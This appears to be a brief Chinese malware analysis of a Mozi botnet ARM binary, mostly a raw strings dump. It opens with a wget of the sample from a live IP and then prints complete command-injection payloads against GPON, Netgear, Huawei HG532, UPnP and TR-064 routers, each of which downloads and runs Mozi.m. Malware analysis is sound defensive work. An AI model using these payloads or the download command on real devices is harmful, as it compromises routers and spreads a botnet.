样本:wget http://182.121.157.194:57811/Mozi.m
    使用linux file strings进行静态分析
    file Mozi.m
    Mozi.m: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
    可以看出这是 linux下可执行文件 32位 静态链接 没有符合表
    strings
    JR*
    gfff
    gfff
    VUUUHY
    VUUU
    Qgfff
    >0@-
    gfff
    @ #!
    !1C “
    POST /cdn-cgi/
    HTTP/1.1
    User-Agent:
    Host:
    Cookie:
    http
    url=
    POST
    socket error
    error
    packet send2 error %d which means %s
    packet send error %d which means %s
    /var/
    .ipds
    .config
    %d.%d.%d.%d
    GET /c HTTP/1.0
    Host: %s
    %hhu.%hhu.%hhu.%hhu
    8.8.8.8 114.114.114.114
    /var/tmp/
    /var/run/
    /dev/shm/
    /proc/
    /usr/
    /mnt/
    /home/
    [cnc]
    [/cnc]
    %5hu
    HTTP/1.1
    Content-Length:
    Content-Type:
    GET %s HTTP/1.1
    Host: %s
    Connection: Keep-Alive
    Content-Type: application/octet-stream
    Referer: http://baidu.com/%s/%s/%d/%s/%s/%s/%s))
    GET %s HTTP/1.1
    Host: %s
    Connection: Keep-Alive
    Content-Type: application/octet-stream
    no aliases
    http://
    https://
    %lu.%lu.%lu.%lu
    (null)
    http://ipinfo.io/ip
    [dip]
    [/dip]
    7001
    POST /GponForm/diag_Form?images/ HTTP/1.1
    Host: 127.0.0.1:80
    Connection: keep-alive
    Accept-Encoding: gzip, deflate
    Accept:     /
    User-Agent: Hello, World
    Content-Length: 118
    XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://%s:%d/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
    POST /picsdesc.xml HTTP/1.1
    Content-Length: 630
    Accept-Encoding: gzip, deflate
    SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
    Accept: /
    User-Agent: Hello-World
    Connection: keep-alive
    <?xml version=”1.0” ?>47450TCP44382cd /var/; wget http://%s:%d/Mozi.m; chmod +x Mozi.m; ./Mozi.m1syncthing0
    GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/    ;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
    GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
    POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
    Host: %s:37215
    Content-Length: 601
    Connection: keep-alive
    Authorization: Digest username=”dslf-config”, realm=”HuaweiHomeGateway”, nonce=”88645cefb1f9ede0e336e3569d75ee30”, uri=”/ctrlt/DeviceUpgrade_1”, response=”3612f843a42db38f48f59d2a3597e19c”, algorithm=”MD5”, qop=”auth”, nc=00000001, cnonce=”248d1a2560100669”
    <?xml version=”1.0” ?>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)$(echo HUAWEIUPNP)
    POST /UD/act?1 HTTP/1.1
    Host: 127.0.0.1:7574
    User-Agent: Hello, world
    SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
    Content-Type: text/xml
    Content-Length: 640
    <?xml version=”1.0”?><u:SetNTPServers xmlns:u=”urn:dslforum-org:service:Time:1&qu ot;>`cd /tmp && rm -rf     && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064</NewNTPServer1><NewNTPServer2>echo DEATH</NewNTPServer2><NewNTPServer3>echo DEATH</NewNTPServer3><NewNTPServer4>echo DEATH</NewNTPServer4><NewNTPServer5>echo DEATH`
    POST /UD/act?1 HTTP/1.1
    Host: 127.0.0.1:5555
    User-Agent: Hello, world
    SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
    Content-Type: text/xml
    Content-Length: 640

    蠕虫传播过程就是,运行以后得到ip,同时搜索广播ip,使用SOAP发送路由器账号密码登录传播蠕虫文件…..大概是这样。